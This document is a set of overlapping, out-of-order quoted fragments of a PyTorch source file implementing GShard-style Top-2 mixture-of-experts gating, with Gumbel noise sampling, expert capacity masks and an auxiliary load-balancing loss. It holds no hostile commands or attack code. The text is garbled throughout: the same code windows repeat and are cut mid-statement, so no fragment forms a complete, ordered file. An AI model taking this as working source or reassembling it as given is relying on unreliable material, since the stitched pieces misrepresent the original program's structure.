"device=device) zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device]",
"F.softmax(logits, dim=1) # gates has shape of SE num_tokens = gates.shape[0] num_experts =",
"locations2_s = torch.sum(locations2 * mask2, dim=1) # Normalize gate probabilities mask1_float = mask1.float()",
"by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple import",
"of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me = torch.mean(gates,",
"num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\",",
"locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2,",
"= F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for 2nd's expert per token using",
"accounting for locations of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux",
"device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] = gumbel return gumbel(shape)",
"Create a mask for 1st's expert per token indices1_s = torch.argmax(gates, dim=1) mask1",
"2nd's location by accounting for locations of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True)",
"per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device)",
"Replace top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1)",
"= torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s # Calculate combine_weights and",
"torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore logits = self.wg(input) return top2gating(logits)",
"from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple import torch from",
"# Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits",
"def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates =",
"This source code is licensed under the BSD license found in the #",
"num_tokens = gates.shape[0] num_experts = gates.shape[1] # capacity = 2S/E capacity = 2",
"-> Tensor: gumbel = gumbel_map.get(device) if gumbel is None: one = torch.tensor(1.0, device=device)",
"torch.sum(locations2 * mask2, dim=1) # Normalize gate probabilities mask1_float = mask1.float() mask2_float =",
"combine_weights = combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask class",
"num_classes=num_experts) # Compute locations in capacity buffer locations1 = torch.cumsum(mask1, dim=0) - 1",
"gates.shape[0] num_experts = gates.shape[1] # capacity = 2S/E capacity = 2 * num_tokens",
"one).rsample # type: ignore gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) ->",
"with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 =",
"dimension num_experts (ints): number of experts in model \"\"\" wg: torch.nn.Linear def __init__(self,",
"= combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module):",
"Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits from lingvo: #",
"torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for 2nd's expert",
"gates, mask2_float) denom_s = gates1_s + gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s,",
"in model \"\"\" wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,) -> None:",
"capacity location for each token locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s =",
"locations in capacity buffer locations1 = torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2,",
"the BSD license found in the # LICENSE file in the root directory",
"= torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec +",
"the root directory of this source tree. # Implementation of Top2Gating described in",
"= torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce) #",
"denom_s = gates1_s + gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s",
"1 locations2 = torch.cumsum(mask2, dim=0) - 1 # Update 2nd's location by accounting",
"num_experts == 0 # Create a mask for 1st's expert per token indices1_s",
"# Normalize gate probabilities mask1_float = mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\",",
"Tuple, device: torch.device) -> Tensor: gumbel = gumbel_map.get(device) if gumbel is None: one",
"gates2_s /= denom_s # Calculate combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float)",
"model \"\"\" wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,) -> None: super().__init__()",
"torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple, device: torch.device)",
"as F gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple, device: torch.device) ->",
"Top2Gating as described in Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask",
"trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with",
"gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights,",
"model embedding dimension num_experts (ints): number of experts in model \"\"\" wg: torch.nn.Linear",
"its affiliates. All rights reserved. # # This source code is licensed under",
"gates1_s + gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s",
"one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample #",
"num_experts (ints): number of experts in model \"\"\" wg: torch.nn.Linear def __init__(self, model_dim:",
"torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s # Calculate combine_weights and dispatch_mask",
"= logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute",
"1 # Update 2nd's location by accounting for locations of 1st locations2 +=",
"type: ignore gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor,",
"class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating as described in Gshard_. :: gate",
"return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\"",
"= torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec",
"Code is inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable,",
"is None: one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero,",
"from typing import Callable, Dict, Tuple import torch from torch import Tensor import",
"combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask = combine_weights.bool()",
":: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf",
"source tree. # Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired",
"mask2 *= torch.lt(locations2, capacity) # Store the capacity location for each token locations1_s",
"directory of this source tree. # Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf #",
"root directory of this source tree. # Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf",
"on logits.\"\"\" gates = F.softmax(logits, dim=1) # gates has shape of SE num_tokens",
"license found in the # LICENSE file in the root directory of this",
"combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating as",
"gumbel_map.get(device) if gumbel is None: one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device)",
"# Replace top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1,",
"Copyright (c) Facebook, Inc. and its affiliates. All rights reserved. # # This",
"denom_s # Calculate combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 =",
"locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask =",
"Update 2nd's location by accounting for locations of 1st locations2 += torch.sum(mask1, dim=0,",
"= 2 * num_tokens // num_experts assert num_tokens % num_experts == 0 #",
"mask2, dim=1) # Normalize gate probabilities mask1_float = mask1.float() mask2_float = mask2.float() gates1_s",
"found in the # LICENSE file in the root directory of this source",
"mask for 1st's expert per token indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s,",
"torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec",
"SE num_tokens = gates.shape[0] num_experts = gates.shape[1] # capacity = 2S/E capacity =",
"1st locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me = torch.mean(gates, dim=0)",
"zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] =",
"combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate",
"denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s # Calculate combine_weights",
"locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask",
"dim=1) # gates has shape of SE num_tokens = gates.shape[0] num_experts = gates.shape[1]",
"expert per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape,",
"+= torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me = torch.mean(gates, dim=0) ce =",
"Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple import torch",
"from torch import Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] = {}",
"gumbel is None: one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel =",
"ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce) # Remove locations outside",
"locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1) #",
"= combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating",
"-> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor) ->",
"https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model embedding dimension num_experts (ints): number of",
"== 0 # Create a mask for 1st's expert per token indices1_s =",
"l_aux me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me *",
"# type: ignore gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor,",
"= F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity buffer locations1 = torch.cumsum(mask1, dim=0)",
"for each token locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2 *",
"torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1) # Normalize gate",
"= torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return",
"by accounting for locations of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute",
"= {} def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel = gumbel_map.get(device) if",
"dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc =",
"logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations",
"embedding dimension num_experts (ints): number of experts in model \"\"\" wg: torch.nn.Linear def",
"= torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0) - 1 # Update",
"/= denom_s gates2_s /= denom_s # Calculate combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\",",
"# capacity = 2S/E capacity = 2 * num_tokens // num_experts assert num_tokens",
"# Remove locations outside capacity from mask mask1 *= torch.lt(locations1, capacity) mask2 *=",
"import Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape:",
"combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating as described in Gshard_.",
"each token locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2 * mask2,",
"denom_s gates2_s /= denom_s # Calculate combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s,",
"dim=1) # Normalize gate probabilities mask1_float = mask1.float() mask2_float = mask2.float() gates1_s =",
"gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\",",
"under the BSD license found in the # LICENSE file in the root",
"* mask1, dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1) # Normalize gate probabilities",
"Calculate combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s,",
"token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) #",
"import Callable, Dict, Tuple import torch from torch import Tensor import torch.nn.functional as",
"num_experts assert num_tokens % num_experts == 0 # Create a mask for 1st's",
"= torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits:",
"model_dim: int, num_experts: int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def",
"gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] = gumbel return gumbel(shape) def",
"Tuple import torch from torch import Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device,",
"using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) # Replace",
"\"\"\"Gate module which implements Top2Gating as described in Gshard_. :: gate = Top2Gate(model_dim,",
"rights reserved. # # This source code is licensed under the BSD license",
"mask2_float) denom_s = gates1_s + gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps)",
"= gumbel_map.get(device) if gumbel is None: one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0,",
"= gates.shape[1] # capacity = 2S/E capacity = 2 * num_tokens // num_experts",
"forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore logits = self.wg(input)",
"mask mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) # Store the capacity",
"Normalize gate probabilities mask1_float = mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates,",
"mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s,",
"typing import Callable, Dict, Tuple import torch from torch import Tensor import torch.nn.functional",
".. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model embedding dimension num_experts (ints):",
"Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple,",
"Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates = F.softmax(logits, dim=1) # gates has",
"dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating as described in Gshard_. ::",
"- 1 locations2 = torch.cumsum(mask2, dim=0) - 1 # Update 2nd's location by",
"Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates = F.softmax(logits, dim=1) # gates has shape",
"* num_tokens // num_experts assert num_tokens % num_experts == 0 # Create a",
"gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on",
"model_dim (int): size of model embedding dimension num_experts (ints): number of experts in",
"= gates1_s + gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /=",
"# https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min",
"F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for 2nd's expert per token using Gumbel-max",
"gates.shape[1] # capacity = 2S/E capacity = 2 * num_tokens // num_experts assert",
"this source tree. # Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is",
"torch.lt(locations2, capacity) # Store the capacity location for each token locations1_s = torch.sum(locations1",
"= torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for 2nd's",
"gate probabilities mask1_float = mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float)",
"= torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] = gumbel",
"ce) # Remove locations outside capacity from mask mask1 *= torch.lt(locations1, capacity) mask2",
"and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc",
"= torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1) # Normalize",
"gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s",
"for 1st's expert per token indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts)",
"= mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s",
"mask for 2nd's expert per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise =",
"num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights =",
"{} def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel = gumbel_map.get(device) if gumbel",
"torch.cumsum(mask2, dim=0) - 1 # Update 2nd's location by accounting for locations of",
"lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple import torch from torch",
"# https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple import torch from torch import",
"mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates,",
"wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,) -> None: super().__init__() self.wg =",
"gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel = gumbel_map.get(device) if gumbel is None:",
"F gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor:",
"(int): size of model embedding dimension num_experts (ints): number of experts in model",
"https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple import torch from torch import Tensor",
"capacity) mask2 *= torch.lt(locations2, capacity) # Store the capacity location for each token",
"\"\"\" wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,) -> None: super().__init__() self.wg",
"= torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity)",
"mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) # Store the capacity location",
"torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce) # Remove",
"torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) # Store the capacity location for each",
"gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements",
"ignore gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]:",
"= torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type:",
"dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model embedding",
"torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates = F.softmax(logits, dim=1)",
"= mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\",",
"- 1 # Update 2nd's location by accounting for locations of 1st locations2",
"locations outside capacity from mask mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity)",
"float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in",
"Create a mask for 2nd's expert per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/",
"= gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating",
"described in Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input)",
"l_aux = torch.mean(me * ce) # Remove locations outside capacity from mask mask1",
"= torch.sum(locations2 * mask2, dim=1) # Normalize gate probabilities mask1_float = mask1.float() mask2_float",
"dim=0, keepdim=True) # Compute l_aux me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0)",
"mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float)",
"mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity buffer locations1 = torch.cumsum(mask1,",
"probabilities mask1_float = mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s",
"gates1_s /= denom_s gates2_s /= denom_s # Calculate combine_weights and dispatch_mask gates1 =",
"assert num_tokens % num_experts == 0 # Create a mask for 1st's expert",
"2nd's expert per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits +",
"indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for",
"torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] = gumbel return",
"Compute locations in capacity buffer locations1 = torch.cumsum(mask1, dim=0) - 1 locations2 =",
"as described in Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask =",
"for 2nd's expert per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits",
"gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity)",
"of model embedding dimension num_experts (ints): number of experts in model \"\"\" wg:",
"= F.softmax(logits, dim=1) # gates has shape of SE num_tokens = gates.shape[0] num_experts",
"# Create a mask for 2nd's expert per token using Gumbel-max trick #",
"# Compute l_aux me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux =",
"code is licensed under the BSD license found in the # LICENSE file",
"value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts)",
"num_experts = gates.shape[1] # capacity = 2S/E capacity = 2 * num_tokens //",
"LICENSE file in the root directory of this source tree. # Implementation of",
"# Store the capacity location for each token locations1_s = torch.sum(locations1 * mask1,",
"locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me = torch.mean(gates, dim=0) ce",
"keepdim=True) # Compute l_aux me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux",
"+ gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\"))",
"token indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a mask",
"inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple",
"\"\"\"Implements Top2Gating on logits.\"\"\" gates = F.softmax(logits, dim=1) # gates has shape of",
"combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float)",
"Callable, Dict, Tuple import torch from torch import Tensor import torch.nn.functional as F",
"* mask2, dim=1) # Normalize gate probabilities mask1_float = mask1.float() mask2_float = mask2.float()",
"Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s #",
"torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore",
"# Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s",
"= torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce) # Remove locations outside capacity",
"Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model embedding dimension num_experts (ints): number",
"num_experts: int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input:",
"torch.device) -> Tensor: gumbel = gumbel_map.get(device) if gumbel is None: one = torch.tensor(1.0,",
"* ce) # Remove locations outside capacity from mask mask1 *= torch.lt(locations1, capacity)",
"in Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input) ..",
"(c) Facebook, Inc. and its affiliates. All rights reserved. # # This source",
"token locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1)",
"*= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) # Store the capacity location for",
"# # This source code is licensed under the BSD license found in",
"mask1, dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1) # Normalize gate probabilities mask1_float",
"gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s",
"logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) #",
"if gumbel is None: one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel",
"None: one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample",
"indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity",
"torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(),",
"return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating as described",
